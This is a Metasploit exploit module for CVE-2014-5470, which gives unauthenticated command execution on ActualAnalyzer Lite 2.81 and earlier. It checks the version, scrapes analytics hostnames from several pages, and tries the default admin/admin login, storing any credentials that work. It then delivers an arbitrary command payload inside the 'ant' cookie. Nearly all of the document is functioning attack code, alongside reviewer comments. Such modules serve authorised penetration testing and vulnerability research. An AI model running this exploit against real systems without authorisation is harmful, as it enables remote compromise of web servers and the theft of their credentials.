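##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Unauthenticated command execution against ActualAnalyzer Lite <= 2.81
# (CVE-2014-5470). The command is delivered inside the 'ant' cookie of a
# request to aa.php; the request must name a host that the installation
# actually monitors (the 'anp' GET parameter), so the module first tries to
# discover such a host from several pages before falling back to guesses.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(
      info,
      'Name' => "ActualAnalyzer 'ant' Cookie Command Execution",
      'Description' => %q{
        This module exploits a command execution vulnerability in
        ActualAnalyzer version 2.81 and prior.

        The 'aa.php' file allows unauthenticated users to
        execute arbitrary commands in the 'ant' cookie.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Benjamin Harris', # Discovery and exploit
          'bcoles' # Metasploit
        ],
      'References' =>
        [
          ['CVE', '2014-5470'],
          ['EDB', '34450'],
          ['OSVDB', '110601']
        ],
      'Payload' =>
        {
          # The payload travels in a Cookie header value, so it is limited to
          # what the server will accept there. Only NUL is declared bad here;
          # see the note on execute_command about ';'.
          'Space' => 4096, # HTTP cookie
          'DisableNops' => true,
          'BadChars' => "\x00"
        },
      'Arch' => ARCH_CMD,
      'Platform' => 'unix',
      'Targets' =>
        [
          # Tested on ActualAnalyzer versions 2.81 and 2.75 on Ubuntu
          ['ActualAnalyzer <= 2.81', { 'auto' => true }]
        ],
      'Privileged' => false,
      'DisclosureDate' => '2014-08-28',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to ActualAnalyzer', '/lite/']),
        # USERNAME/PASSWORD are only used by get_analytics_host_admin, which is
        # one of the host-discovery fallbacks tried when ANALYZER_HOST is unset.
        OptString.new('USERNAME', [true, 'The username for ActualAnalyzer', 'admin']),
        OptString.new('PASSWORD', [true, 'The password for ActualAnalyzer', 'admin']),
        OptString.new('ANALYZER_HOST', [false, 'A hostname or IP monitored by ActualAnalyzer', ''])
      ])
  end

  #
  # Checks if target is running ActualAnalyzer <= 2.81
  #
  # Two requests: aa.php to confirm the application is present and installed,
  # then view.php to read the version string out of the page title attribute.
  #
  # @return [Exploit::CheckCode] Unknown on connection failure, Safe when
  #   aa.php is missing or nothing identifies the product, Detected when the
  #   product is found but is unconfigured or its version cannot be read (or
  #   is newer than 2.81), Vulnerable when the parsed version is <= 2.81.
  def check
    # check for aa.php
    res = send_request_raw('uri' => normalize_uri(target_uri.path, 'aa.php'))
    if !res
      vprint_error("Connection failed")
      return Exploit::CheckCode::Unknown
    elsif res.code == 404
      vprint_error("Could not find aa.php")
      return Exploit::CheckCode::Safe
    elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/ && res.body =~ /Admin area<\/title>/
      # A fresh, unconfigured install serves the admin setup page instead of
      # processing aa.php; the bug is not reachable until setup is complete.
      vprint_error("ActualAnalyzer is not installed. Try installing first.")
      return Exploit::CheckCode::Detected
    end

    # check version
    res = send_request_raw('uri' => normalize_uri(target_uri.path, 'view.php'))
    if !res
      vprint_error("Connection failed")
      return Exploit::CheckCode::Unknown
    elsif res.code == 200 && /title="ActualAnalyzer Lite \(free\) (?<version>[\d\.]+)"/ =~ res.body
      # The named capture above binds the local variable `version`.
      vprint_status("Found version: #{version}")
      if Rex::Version.new(version) <= Rex::Version.new('2.81')
        report_vuln(
          host: rhost,
          name: self.name,
          info: "Module #{fullname} detected ActualAnalyzer #{version}",
          refs: references,
        )
        return Exploit::CheckCode::Vulnerable
      end
      return Exploit::CheckCode::Detected
    elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  #
  # Try to retrieve a valid analytics host from view.php unauthenticated
  #
  # Posts the form state that makes view.php render its page selector and
  # pulls the host out of the first "Page: http(s)://host/..." option.
  #
  # @return [String, nil] the discovered host, or nil when none was found
  def get_analytics_host_view
    analytics_host = nil
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'view.php'),
      'vars_post' => {
        'id_h' => '',
        'listp' => '',
        'act_h' => 'vis_int',
        'oldact' => 'vis_grpg',
        'tint_h' => '',
        'extact_h' => '',
        'home_pos' => '',
        'act' => 'vis_grpg',
        'tint' => 'total',
        'grpg' => '201',
        'cp_vst' => 'on',
        'cp_hst' => 'on',
        'cp_htst' => 'on',
        'cp_reps' => 'y',
        'tab_sort' => '1_1'
      }
    )
    if !res
      vprint_error("Connection failed")
    elsif /<option value="?[\d]+"?[^>]*>Page: https?:\/\/(?<analytics_host>[^\/^<]+)/ =~ res.body
      vprint_good("Found analytics host: #{analytics_host}")
      return analytics_host
    else
      vprint_status("Could not find any hosts on view.php")
    end
    nil
  end

  #
  # Try to retrieve a valid analytics host from code.php unauthenticated
  #
  # code.php?pid=1 returns the tracking snippet for the first page; the host
  # is taken from the image URL embedded in that snippet.
  #
  # @return [String, nil] the discovered host, or nil when none was found
  def get_analytics_host_code
    analytics_host = nil
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'code.php'),
      'vars_get' => {
        'pid' => '1'
      }
    )
    if !res
      vprint_error("Connection failed")
    elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body
      vprint_good("Found analytics host: #{analytics_host}")
      return analytics_host
    else
      vprint_status("Could not find any hosts on code.php")
    end
    nil
  end

  #
  # Try to retrieve a valid analytics host from admin.php with creds
  #
  # Authenticates with USERNAME/PASSWORD and reads the host from the tracking
  # snippet shown on the admin page. This is a noisier step than the two
  # unauthenticated lookups (it generates a login attempt, successful or not)
  # and is only reached when those did not produce a host. A successful login
  # is reported and the credential is stored in the database.
  #
  # @return [String, nil] the discovered host, or nil on failure
  def get_analytics_host_admin
    analytics_host = nil
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin.php'),
      'vars_post' => {
        'uname' => user,
        'passw' => pass,
        'id_h' => '',
        'listp' => '',
        'act_h' => '',
        'oldact' => 'pages',
        'tint_h' => '',
        'extact_h' => '',
        'param_h' => '',
        'param2_h' => '',
        'home_pos' => '',
        'act' => 'dynhtml',
        'set.x' => '11',
        'set.y' => '11'
      }
    )
    if !res
      vprint_error("Connection failed")
    elsif res.code == 200 && res.body =~ />Login</
      vprint_error("Login failed")
    elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body
      vprint_good("Found analytics host: #{analytics_host}")
      print_good("Login Successful (#{user}:#{pass})")
      store_valid_credential(user: user, private: pass)
      return analytics_host
    else
      vprint_error("Could not find any hosts on admin.php")
    end
    nil
  end

  # Sends the payload to aa.php for one candidate analytics host.
  #
  # The command is placed verbatim in the 'ant' cookie. A second cookie,
  # 'anw' or 'anm' chosen at random, carries a three-digit number followed by
  # a backtick-quoted `$cot` reference (Ruby does not interpolate `$cot` in a
  # double-quoted string, so it is sent literally); presumably that is what
  # makes the server evaluate the 'ant' value, but the server side is not
  # visible from this module.
  #
  # The redirect to error.gif ("host not monitored") is tested BEFORE the
  # generic image redirect so that such a response can never be misreported
  # as a successful delivery, whatever Content-Type the redirect carries.
  #
  # NOTE(review): under standard Cookie-header parsing a literal ';' inside
  # the command would terminate the 'ant' value early, yet only "\x00" is
  # declared as a bad char for the payload. If delivery silently fails with
  # a payload that contains ';', that is the first thing to check.
  #
  # @param cmd [String] the command to execute
  # @param opts [Hash] :analytics_host - a hostname or IP monitored by
  #   ActualAnalyzer; defaults to the HTTP vhost
  # @return [true, nil] true when the payload was accepted, nil when the host
  #   is not monitored; any other response aborts the module via fail_with
  def execute_command(cmd, opts = { analytics_host: vhost })
    vuln_cookies = %w(anw anm)
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'aa.php'),
      'vars_get' => { 'anp' => opts[:analytics_host] },
      'cookie' => "ant=#{cmd}; #{vuln_cookies.sample}=#{rand(100...999)}.`$cot`"
    )
    if !res
      fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out")
    elsif res.code == 302 && res.headers['Location'] =~ /error\.gif/
      vprint_status("Host '#{opts[:analytics_host]}' is not monitored by ActualAnalyzer.")
    elsif res.code == 302 && res.headers['Content-Type'] =~ /image/
      print_good("Payload sent successfully")
      return true
    elsif res.code == 200 && res.body =~ /Admin area<\/title>/
      fail_with(Failure::Unknown, "#{peer} - ActualAnalyzer is not installed. Try installing first.")
    else
      fail_with(Failure::Unknown, "#{peer} - Something went wrong")
    end
    nil
  end

  # Runs the check, builds the list of candidate analytics hosts and fires
  # the payload at each one until execute_command reports success.
  #
  # When ANALYZER_HOST is unset the candidates are, in order: the hosts found
  # on code.php, view.php and admin.php (the last one performs a login with
  # USERNAME/PASSWORD), then the request vhost, 127.0.0.1 and localhost.
  # Lookups that found nothing return nil and are dropped before iterating.
  def exploit
    return unless check == Exploit::CheckCode::Vulnerable

    analytics_hosts = []
    if datastore['ANALYZER_HOST'].blank?
      analytics_hosts << get_analytics_host_code
      analytics_hosts << get_analytics_host_view
      analytics_hosts << get_analytics_host_admin
      analytics_hosts << vhost
      analytics_hosts << '127.0.0.1'
      analytics_hosts << 'localhost'
    else
      analytics_hosts << datastore['ANALYZER_HOST']
    end

    analytics_hosts.compact.uniq.each do |host|
      vprint_status("Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...")
      break if execute_command(payload.encoded, analytics_host: host)
    end
  end
end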